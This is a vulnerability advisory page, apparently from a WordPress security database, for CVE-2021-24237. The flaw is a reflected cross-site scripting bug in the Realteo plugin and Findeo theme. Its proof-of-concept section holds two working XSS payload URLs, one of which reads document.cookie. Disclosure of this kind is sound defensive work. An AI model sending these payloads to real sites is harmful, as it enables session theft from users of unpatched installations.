logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

Realteo < 1.2.4 - Unauthenticated Reflected Cross-Site Scripting (XSS)

Description

The plugin, used by the Findeo Theme, did not properly sanitise the keyword_search, search_radius. _bedrooms and _bathrooms GET parameters before outputting them in its properties page, leading to an unauthenticated reflected Cross-Site Scripting issue.

Proof of Concept

https://example.com/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(`m0ze`);//%22

https://example.com/properties/?keyword_search=--!%3E%22%20autofocus%20onfocus=alert(document.cookie);//%22&search_radius=--!%3E%22%20autofocus%20onfocus=alert(document.cookie);//%22

Affects Plugins

realteo

Fixed in version 1.2.4

Affects Themes

findeo

Fixed in version 1.3.1

References

CVE

CVE-2021-24237

URL

https://www.docs.purethemes.net/findeo/knowledge-base/changelog-findeo/

URL

https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Findeo-WordPress-Theme-v1.3.0.txt

URL

https://m0ze.ru/vulnerability/[2021-03-20]-[WordPress]-[CWE-79]-Realteo-WordPress-Plugin-v1.2.3.txt

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CWE-79

Miscellaneous

Original Researcher

m0ze

Submitter

m0ze

Submitter website

https://m0ze.ru

Submitter twitter

vladm0ze

Verified

Yes

WPVDB ID

087b27c4-289e-410f-af74-828a608a4e1e

Timeline

Publicly Published

2021-03-31 (about 5 months ago)

Added

2021-04-01 (about 5 months ago)

Last Updated

2021-04-03 (about 5 months ago)

Our Other Services

WPScan WordPress Security Plugin